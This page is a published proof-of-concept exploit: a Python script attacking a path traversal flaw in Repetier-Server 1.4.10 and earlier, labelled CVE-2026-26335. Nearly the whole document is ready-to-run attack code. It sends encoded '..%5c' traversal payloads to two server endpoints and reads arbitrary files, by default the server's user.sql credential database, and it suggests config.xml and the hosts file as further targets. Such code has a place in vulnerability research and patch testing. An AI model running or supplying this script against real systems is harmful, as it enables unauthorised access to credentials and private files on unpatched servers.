Repetier-Server 1.4.10 Exploit, Path TraversalGo BackDownload

# Exploit Title:    Repetier-Server 1.4.10 - Path Traversal
# Exploit Author:   Mohammed Idrees Banyamer
# Vendor Homepage:  https://www.repetier.com/
# Version:          <= 1.4.10
# Tested on:        Windows 10 / Windows Server 2019 (Repetier-Server default install)
# CVE:              CVE-2026-26335
# Advisory:         https://cybir.com/2023/cve/poc-repetier-server-140/ (related research)
# CVSS:             9.8 (Critical) - AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N

import requests
import argparse
import sys
from urllib.parse import urljoin


def generate_traversal(depth: int = 15) -> str:
    return "..%5c" * depth


def attempt_read(target_url: str, file_path: str, traversal_depth: int = 15, timeout: int = 10) -> bool:
    traversal = generate_traversal(traversal_depth)

    payloads = [
        f"views{traversal}{file_path}/base/connectionLost.php",
        f"base/connectionLost.php?file={traversal}{file_path}",
    ]

    print(f"[*] Targeting: {target_url}")
    print(f"[*] Attempting to read: {file_path}")
    print(f"[*] Traversal depth: {traversal_depth}")

    for payload in payloads:
        exploit_url = urljoin(target_url.rstrip("/") + "/", payload)

        try:
            print(f"  → Trying: {exploit_url}")
            r = requests.get(exploit_url, timeout=timeout, verify=False)

            if r.status_code == 200 and len(r.content) > 60:
                sample = r.text[:500].replace("\n", " ").strip()
                print(f"[+] LIKELY SUCCESS (status {r.status_code}, {len(r.content)} bytes)")
                print(f"    Preview:\n    {sample}...")
                return True
            else:
                print(f"  → Failed (status {r.status_code}, size {len(r.content)})")

        except requests.RequestException as e:
            print(f"  → Error: {e}")

    return False


def main():
    parser = argparse.ArgumentParser(
        description="CVE-2026-26335 PoC - Repetier-Server Path Traversal / LFI"
    )
    parser.add_argument("target", help="Target base URL (e.g. http://192.168.1.100:3344/)")
    parser.add_argument("--file", default="ProgramData\\Repetier-Server\\database\\user.sql",
                        help="File path to read (use Windows \\ separator)")
    parser.add_argument("--depth", type=int, default=15, help="Traversal depth")
    parser.add_argument("--test", action="store_true", help="Quick test with Windows\\win.ini")

    args = parser.parse_args()

    if args.test:
        args.file = "Windows\\win.ini"
        print("[i] Running test mode → targeting Windows\\win.ini")

    file_path = args.file.replace("\\", "%5c")

    print("=" * 70)
    print("CVE-2026-26335 Exploit PoC - Repetier-Server <=1.4.10 Path Traversal")
    print("USE ONLY ON SYSTEMS YOU OWN OR HAVE EXPLICIT PERMISSION TO TEST!")
    print("=" * 70, "\n")

    success = attempt_read(args.target, file_path, args.depth)

    if not success:
        print("\n[!] Exploitation attempt failed.")
        print("Suggestions:")
        print("  • Increase --depth (try 18–30)")
        print("  • Verify target is running Repetier-Server <=1.4.10")
        print("  • Try alternative interesting files:")
        print("      - ProgramData%5cRepetier-Server%5cconfig.xml")
        print("      - Windows%5csystem32%5cdrivers%5cetc%5chosts")


if __name__ == "__main__":
    main()